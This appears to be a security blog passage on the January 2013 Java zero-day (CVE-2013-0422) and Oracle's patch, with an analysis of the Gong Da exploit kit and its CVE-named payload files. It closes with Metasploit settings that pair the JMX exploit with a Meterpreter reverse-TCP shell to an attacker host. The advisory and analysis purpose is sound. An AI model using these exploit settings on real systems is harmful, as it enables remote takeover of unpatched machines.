As always Oracle mention that the vulnerabilities are not applicable to Java running on servers, standalone Java desktop applications or embedded Java applications. But Oracle seem to forget that servers could crawl Internet, and that Java could be used to fetch web pages…
One interesting point is that Oracle push the default security level, introduced in version 7 Update 10, from “Medium” to “High“. With the “High” setting, the user is always prompted before any unsigned Java applet or Java Web Start application is run. This setting is looking like the default “Click-to-play” functionality introduced into Firefox and into Chrome.
Another interesting point, is that this update is fixing two vulnerabilities, CVE-2013-0422 known through the Java 0day discovery, but also CVE-2012-3174 who has a base CVSS score of 10.0. Ben Murphy, via TippingPoint (ZDI…), is credited for the vulnerabilities. CVE-2012-3174 is assigned since 6 Jun 2012 !!!
So hopefully, Oracle has release a patch, I strongly advise you to patch asap !
If you are working in computer security and still don’t have hear about the latest Oracle Java 0day, aka CVE-2013-0422, then you should change you job ! This last Oracle Java 0day was discovered massively exploited in exploit kits by @kafeine the 10th January. Other exploit kits have quickly add support of this new vulnerability, like Gong Da exploit kit.
This new version was discovered on “hxxp://syspio.com/data/m.html” a web site how is actually still online.
“syspio.com” is hosted on 18.104.22.168, in KR and this domain name seem to be associated with a legit compromised web site.
After de-obfuscation of the “m.html” file you can see that Gong Da Pack has involve to the following diagram.
Here under some information s regarding the different files:
EnKi2.jpg (aka CVE-2011-3544) : 8/46 on VirusTotal.com
cLxmGk3.jpg (aka CVE-2012-0507) : 11/46 on VirusTotal.com
OLluRM4.jpg (aka CVE-2012-1723) : 20/46 on VirusTotal.com
GPUrKz2.jpg (aka CVE-2012-4681) : 29/45 on VirusTotal.com
PBLO5.jpg (aka CVE-2012-5076) : 12/46 on VirusTotal.com
Nuwm7.jpg (aka CVE-2013-0422): 6/46 on VirusTotal.com
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26